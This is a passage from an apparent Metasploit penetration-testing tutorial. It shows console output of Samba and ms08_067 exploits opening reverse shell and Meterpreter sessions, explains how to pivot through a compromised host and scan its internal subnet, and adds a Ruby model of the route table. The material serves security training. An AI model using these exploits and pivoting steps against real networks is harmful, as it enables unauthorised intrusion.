Meterpreter
91
[+] Server did not respond, this is expected
[*] Trying to exploit Samba with address 0xffffe411...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Trying to exploit Samba with address 0xffffe412...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Calling the vulnerable function...
[*] Sending stage (36 bytes)
[*] Command shell session 1 opened (10.10.1.129:8080 -> 192.168.33.132:1608)
Compare the LHOST and RHOST variables to the network information displayed by ifconfig. Our LHOST option specifies the IP address of our attacking machine. Also notice that the RHOST option's IP address is on a different network subnet: we are attacking systems by tunneling our traffic through our compromised target to additional systems on the target's network. We are leveraging the pivoting attack through Metasploit to pass communications through our exploited machine to the target machine that resides on the local subnet. In this case, if the heap overflow is successful, we should be presented with a reverse shell from 192.168.33.132, simply by leveraging the network communications of the already compromised machine. When we run the exploit with exploit, we see that a connection is set up as expected on a different machine, not the Windows XP machine. Now, to port scan through the pivot, we would use the scanner/portscan/tcp scanner module, which is built to handle routing through Metasploit.
NOTE
You could also use the scanner/portscan/tcp scanner to conduct a series of port scans through your compromised target on the local subnet itself. We won't go into the details here, but just know that you can perform port scanning on a compromised network leveraging this module.
In the preceding examples, we used the route add command after we had compromised the system. Alternatively, to add the routes automatically to Meterpreter upon a new session spawn, we could use load auto_add_route:
msf exploit(ms08_067_netapi) > load auto_add_route
[*] Successfully loaded plugin: auto_add_route
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 10.10.1.129:443
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (10.10.1.129:443 -> 192.168.33.130:1090)
[*] AutoAddRoute: Routing new subnet 192.168.33.0/255.255.255.0 through session 1
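The routing decision behind route add, route print and the auto_add_route plugin, as an added example that is not code from this book or from the Metasploit Framework: a simplified Ruby model of the pivot route table. The class and method names (PivotRoutes, session_for, auto_add_route, print_table) are assumptions for illustration only; the real framework keeps its routes in Rex::Socket::SwitchBoard and relays each TCP connection through the Meterpreter session's channels, which this model does not do. The sample interface list is constructed from the addresses on this page.

```ruby
require 'ipaddr'

# Added illustration, not Metasploit code: a simplified model of the pivot
# route table behind `route add`, `route print` and the auto_add_route plugin.
# The real framework keeps routes in Rex::Socket::SwitchBoard and relays each
# TCP connection through the Meterpreter session's channels; this model only
# performs the lookup that decides which session (if any) carries a connection.
class PivotRoutes
  Route = Struct.new(:subnet, :netmask, :session) do
    def network
      IPAddr.new("#{subnet}/#{netmask}")
    end

    # Number of 1 bits in the netmask, used for longest-prefix matching.
    def prefix_len
      IPAddr.new(netmask).to_i.to_s(2).count('1')
    end
  end

  def initialize
    @routes = []
  end

  # Equivalent of `route add 192.168.33.0 255.255.255.0 1`.
  def add(subnet, netmask, session)
    @routes << Route.new(subnet, netmask, session)
    self
  end

  # Equivalent of `route remove <subnet> <netmask> <session>`.
  def remove(subnet, netmask, session)
    @routes.reject! { |r| [r.subnet, r.netmask, r.session] == [subnet, netmask, session] }
    self
  end

  # Returns the session id that should carry traffic to `ip`, or nil when no
  # route matches and the connection leaves the attacker's own network stack.
  # The most specific (longest prefix) route wins.
  def session_for(ip)
    addr = IPAddr.new(ip)
    best = @routes.select { |r| r.network.include?(addr) }.max_by(&:prefix_len)
    best && best.session
  end

  # What the auto_add_route plugin does when a session spawns: for every
  # interface the session reports, add that interface's subnet through the
  # session. `interfaces` is [[ip, netmask], ...] as a Meterpreter ipconfig
  # would list them. Loopback is skipped (a modelling choice here, not a
  # statement about the plugin). Returns log lines in the page's format.
  def auto_add_route(session, interfaces)
    interfaces.reject { |ip, _| ip.start_with?('127.') }.map do |ip, mask|
      subnet = IPAddr.new("#{ip}/#{mask}").to_s   # mask off the host bits
      add(subnet, mask, session)
      "[*] AutoAddRoute: Routing new subnet #{subnet}/#{mask} through session #{session}"
    end
  end

  # Equivalent of `route print`.
  def print_table
    header = ["Active Routing Table", "",
              format("   %-18s %-18s %s", "Subnet", "Netmask", "Gateway"),
              format("   %-18s %-18s %s", "------", "-------", "-------")]
    rows = @routes.map { |r| format("   %-18s %-18s Session %d", r.subnet, r.netmask, r.session) }
    (header + rows).join("\n")
  end
end

if __FILE__ == $PROGRAM_NAME
  routes = PivotRoutes.new
  # Constructed sample: session 1 is the XP box at 192.168.33.130/24 from the page.
  puts routes.auto_add_route(1, [["127.0.0.1", "255.0.0.0"], ["192.168.33.130", "255.255.255.0"]])
  puts routes.print_table
  p routes.session_for("192.168.33.132")  # Samba target on the far subnet -> 1
  p routes.session_for("10.10.1.129")     # attacker's own subnet -> nil (no pivot)
end
```

The longest-prefix rule is the part worth checking when a scan through the pivot misbehaves: a broad route (say a /16) added for one session will silently capture hosts that a later, narrower route was meant to send through another session, so run route print and confirm the most specific entry points at the session you expect before launching scanner/portscan/tcp.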